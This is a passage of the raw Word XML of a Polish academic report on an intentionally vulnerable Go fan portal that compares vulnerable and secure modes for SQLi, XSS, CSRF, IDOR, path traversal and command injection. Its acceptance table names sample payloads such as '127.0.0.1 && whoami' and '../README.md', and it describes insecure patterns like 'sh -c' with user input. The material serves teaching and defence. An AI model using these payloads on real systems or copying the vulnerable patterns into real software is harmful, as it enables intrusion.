        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dla Path Traversal użyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fanart vault</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Dla Command Injection użyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stream check</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:t>Po każdym ataku przełączyć secure i powtórzyć ten sam payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">11. </w:t>
      </w:r>
      <w:r>
        <w:t>Pokazać, że funkcja nadal istnieje, tylko input jest kontrolowany.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">12. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Na końcu uruchomić testy integracyjne albo pokazać wynik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>PASS</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="64" w:name="sec64"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>18. Załącznik D: najważniejsze różnice vulnerable vs secure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Vulnerable: konkatenacja stringów. Secure: parametry </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Vulnerable: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>templ.Raw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dla komentarzy. Secure: escaping HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Vulnerable: istnienie loginu wystarcza. Secure: bcrypt i ograniczenie prób.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Vulnerable: tylko sprawdzenie logowania. Secure: właściciel zasobu albo admin.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Vulnerable: brak tokena. Secure: token w formularzu i cookie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Hasła</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Vulnerable: plaintext. Secure: bcrypt.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Pliki</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Vulnerable: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads + "/" + name</w:t>
      </w:r>
      <w:r>
        <w:t>. Secure: normalizacja i kontrola katalogu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Komendy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Vulnerable: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z inputem użytkownika. Secure: regex oraz </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>exec.Command</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bez shella.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="65" w:name="sec65"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>19. Załącznik E: argumentacja inżynierska</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Najważniejszą wartością projektu nie jest sama lista podatności, tylko porównanie decyzji implementacyjnych. Każdy błąd wynika z konkretnego uproszczenia:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection wynika z traktowania tekstu użytkownika jako fragmentu języka SQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Stored XSS wynika z zaufania do treści użytkownika przy renderowaniu HTML.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Broken Authentication wynika z pomylenia identyfikacji użytkownika z uwierzytelnieniem.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>IDOR wynika z braku autoryzacji zasobu po stronie serwera.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CSRF wynika z założenia, że obecność cookie oznacza intencję użytkownika.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Sensitive Data Exposure wynika z przechowywania sekretu w formie możliwej do bezpośredniego odczytu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Path Traversal wynika z zaufania do ścieżki podanej przez użytkownika.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Command Injection wynika z przekazania inputu do interpretera powłoki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Wersja secure nie usuwa funkcji, tylko zmienia granice zaufania. Dobry system nie blokuje użytkownikowi normalnych operacji, ale waliduje i interpretuje dane w kontrolowany sposób.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="66" w:name="sec66"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>20. Załącznik F: macierz ryzyka dla funkcji aplikacji</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Poniższa macierz pokazuje ryzyko nie jako listę laboratoryjnych podatności, ale jako ryzyko wynikające z funkcji udostępnionych użytkownikowi portalu. Taki opis łączy lukę z konkretną decyzją projektową, wpływem biznesowym oraz testem, który można powtórzyć.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vocaloid library / SQL Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prawdopodobieństwo: 5. Wpływ: 5. Ryzyko: 25.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fan comments / Stored XSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prawdopodobieństwo: 4. Wpływ: 5. Ryzyko: 20.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Login / Broken Authentication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prawdopodobieństwo: 4. Wpływ: 5. Ryzyko: 20.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Profile settings / CSRF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prawdopodobieństwo: 4. Wpływ: 4. Ryzyko: 16.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Moderation queue / IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prawdopodobieństwo: 4. Wpływ: 4. Ryzyko: 16.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Member directory / Sensitive Data Exposure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prawdopodobieństwo: 3. Wpływ: 5. Ryzyko: 15.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fanart vault / Path Traversal</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prawdopodobieństwo: 3. Wpływ: 5. Ryzyko: 15.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stream check / Command Injection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Prawdopodobieństwo: 3. Wpływ: 5. Ryzyko: 15.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Skala 1-5 jest celowo prosta. W projekcie akademickim ważniejsza jest powtarzalność oceny niż pełna formalizacja jak w CVSS. Najwyżej oceniono SQL Injection, ponieważ publiczne pole wyszukiwania ma niską barierę wejścia i może prowadzić do szerokiego naruszenia poufności oraz integralności danych.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Uzasadnienie ocen:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Vocaloid library</w:t>
      </w:r>
      <w:r>
        <w:t>: pole wyszukiwania jest publiczne, więc SQLi ma bardzo niski próg wykonania.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fan comments</w:t>
      </w:r>
      <w:r>
        <w:t>: komentarz jest zapisywany i później wyświetlany innym użytkownikom.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
      <w:r>
        <w:t>: znajomość loginu w trybie vulnerable wystarcza do przejęcia sesji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Profile settings</w:t>
      </w:r>
      <w:r>
        <w:t>: CSRF można wykonać przez obcą stronę, jeśli ofiara jest zalogowana.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Moderation queue</w:t>
      </w:r>
      <w:r>
        <w:t>: ID w URL pozwala celować w cudzy zasób.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Member directory</w:t>
      </w:r>
      <w:r>
        <w:t>: wyciek bazy w trybie vulnerable oznacza wyciek haseł jawnych.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Fanart vault</w:t>
      </w:r>
      <w:r>
        <w:t>: parametr pliku może wyjść poza katalog uploadów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Stream check</w:t>
      </w:r>
      <w:r>
        <w:t>: input trafiający do powłoki pozwala dopisać dodatkowe polecenie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="67" w:name="sec67"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>20.1. Interpretacja macierzy</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Wersja vulnerable pokazuje typowy błąd: funkcja działa szybko, ale bez kontroli granic zaufania. Wersja secure nie zmienia celu funkcji. Zmienione zostają tylko reguły interpretacji danych:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>zapytanie użytkownika jest danymi, nie kodem SQL;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>komentarz użytkownika jest tekstem, nie HTML-em aplikacji;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>ID w URL jest wskazówką, nie dowodem uprawnienia;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>cookie sesyjne dowodzi zalogowania, ale nie dowodzi intencji wykonania akcji;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>nazwa pliku jest nazwą logiczną, nie dowolną ścieżką systemową;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>host diagnostyczny jest argumentem programu, nie fragmentem komendy powłoki.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="68" w:name="sec68"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>21. Załącznik G: kryteria akceptacji po poprawkach</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Poniższe kryteria można potraktować jako checklistę odbioru projektu. Każdy punkt jest sformułowany tak, aby dało się go zweryfikować ręcznie lub testem integracyjnym.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="3003" w:name="tbl3"/>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Tabela 3. Zestawienie danych raportowych. Źródło: opracowanie własne.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3003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9EA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1928"/>
            <w:shd w:fill="D9EA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Funkcja</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:fill="D9EA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Kryterium vulnerable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:fill="D9EA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Kryterium secure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:fill="D9EA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AC-01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Library search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Payload SQLi zwraca dane niezgodne z normalnym wyszukiwaniem.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Ten sam payload jest traktowany jak zwykły tekst.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Spełnione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AC-02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Fan comments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Skrypt zapisany w komentarzu renderuje się jako HTML.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Skrypt jest wyświetlany jako tekst.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Spełnione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AC-03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Sam login może utworzyć sesję użytkownika.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Hasło jest sprawdzane przez bcrypt.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Spełnione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AC-04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Profile settings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Sfałszowany POST bez tokena zmienia email.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Ten sam POST bez tokena zwraca 403.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Spełnione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AC-05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Moderation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Użytkownik może wskazać cudzy post po ID.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Serwer sprawdza właściciela albo rolę admina.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Spełnione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AC-06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Members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Widoczne są hasła jawne z seeda vulnerable.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Widoczne są hashe bcrypt.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Spełnione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AC-07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Fanart vault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../README.md może zostać odczytany.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Ścieżka z ../ jest blokowana.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Spełnione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AC-08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Stream check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127.0.0.1 &amp;&amp; whoami wykonuje dodatkowe polecenie.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Payload z metaznakami jest odrzucony.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Spełnione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Najważniejsze kryterium architektoniczne dotyczy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. W poprzedniej wersji można było błędnie zinterpretować projekt jako dwa osobne formularze: podatny i bezpieczny. Po zmianie endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jest jedną funkcją, a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ProfileSettings()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> wybiera ścieżkę na podstawie aktualnego trybu. Dzięki temu atak i poprawka dotyczą tej samej funkcjonalności.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="69" w:name="sec69"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>21.1. Przykład testu akceptacyjnego dla profilu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/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ProfileSettings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   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       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CsrfSecureForm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       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    </w:t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   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CsrfFormVulnerable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</w:t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80" w:name="lst80"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 80. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2080"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Test integracyjny potwierdza trzy warunki:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W trybie vulnerable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bez tokena zmienia email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">W trybie secure </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bez tokena zwraca </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>403 Forbidden</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>W trybie secure legalny formularz z tokenem nadal pozwala zmienić email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>To rozróżnienie jest ważne dydaktycznie. Celem nie jest zablokowanie funkcji profilu, tylko pokazanie, że ta sama funkcja może być napisana naiwnie albo poprawnie.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="70" w:name="sec70"/>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>22. Załącznik H: scenariusz omówienia dla prowadzącego</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p>
      <w:r>
        <w:t>Scenariusz weryfikacji powinien być prowadzony w jednej narracji produktowej. Proponowany wstęp: "to jest fanowski portal MikuMiku Fan Hub; przejdziemy przez jego zwykłe funkcje i pokażemy, gdzie błędne decyzje implementacyjne tworzą podatności".</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="71" w:name="sec71"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.1. Etap 1 - kontekst aplikacji</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Otworzyć </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/posts</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Pokazać, że aplikacja ma posty, komentarze, profil, bibliotekę, członków i narzędzia społecznościowe.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t>Wskazać przełącznik trybu bezpieczeństwa.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="312" w:hanging="198"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:t>Wyjaśnić, że tryb vulnerable i secure korzystają z tego samego kodu aplikacji, ale innych gałęzi walidacji.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="72" w:name="sec72"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>22.2. Etap 2 - ataki z poziomu użytkownika</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p>
      <w:pPr>
